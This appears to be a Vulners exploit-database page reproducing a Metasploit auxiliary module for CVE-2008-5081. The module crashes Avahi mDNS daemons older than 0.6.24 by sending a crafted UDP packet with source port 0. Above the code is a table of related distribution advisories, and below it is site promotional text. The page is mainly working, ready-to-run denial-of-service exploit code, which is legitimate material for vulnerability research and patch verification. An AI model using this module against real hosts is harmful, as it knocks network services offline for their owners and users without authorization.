Vulners
Lucene search
Avahi Source Port 0 Denial of Service
🗓️ 31 Aug 2024 00:00:00Reported by Kris Katterjohn, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 166 Views
| Reporter | Title | Published | Views | Family All 80 |
|---|---|---|---|---|
 | Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit | 19 Dec 200800:00 | – | zdt |
 | The vulnerability of the Gentoo Linux operating system, which allows a malicious intruder to compromise the accessibility of protected information | 28 Apr 201500:00 | – | bdu_fstec |
 | CentOS 5 : avahi (CESA-2009:0013) | 6 Jan 201000:00 | – | nessus |
| Debian DSA-1690-1 : avahi - assert errors | 22 Dec 200800:00 | – | nessus |
| Fedora 10 : avahi-0.6.22-12.fc10 (2008-11351) | 23 Apr 200900:00 | – | nessus |
| GLSA-200901-11 : Avahi: Denial of Service | 15 Jan 200900:00 | – | nessus |
| Mandriva Linux Security Advisory : avahi (MDVSA-2009:031) | 23 Apr 200900:00 | – | nessus |
| Mandriva Linux Security Advisory : avahi (MDVSA-2010:204) | 15 Oct 201000:00 | – | nessus |
| MiracleLinux 3 : avahi-0.6.16-1AXS3.1 (AXSA:2009-06:01) | 14 Jan 202600:00 | – | nessus |
| MiracleLinux 3 : avahi-0.6.16-9.AXS3 (AXSA:2010-380:02) | 14 Jan 202600:00 | – | nessus |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Avahi Source Port 0 DoS',
'Description' => %q{
Avahi-daemon versions prior to 0.6.24 can be DoS'd
with an mDNS packet with a source port of 0.
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2008-5081' ],
[ 'OSVDB', '50929' ],
],
'DisclosureDate' => 'Nov 14 2008')
register_options([
OptInt.new('RPORT', [true, 'The destination port', 5353])
])
deregister_options('FILTER','PCAPFILE')
end
def run
open_pcap
print_status("Sending to #{rhost}")
p = PacketFu::UDPPacket.new
p.ip_saddr = "0.0.0.0"
p.ip_daddr = rhost
p.ip_frag = 0x4000 # Original had ip frag flags set to 2 for some reason.
p.udp_sport = 0 # That's the bug
p.udp_dport = datastore['RPORT'].to_i
p.payload = Rex::Text.rand_text(rand(0x20)) # UDP needs at least one data byte, may as well send a few.
p.recalc
capture_sendto(p, rhost) and print_status("Avahi should be down now")
close_pcap
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 25
EPSS0.77078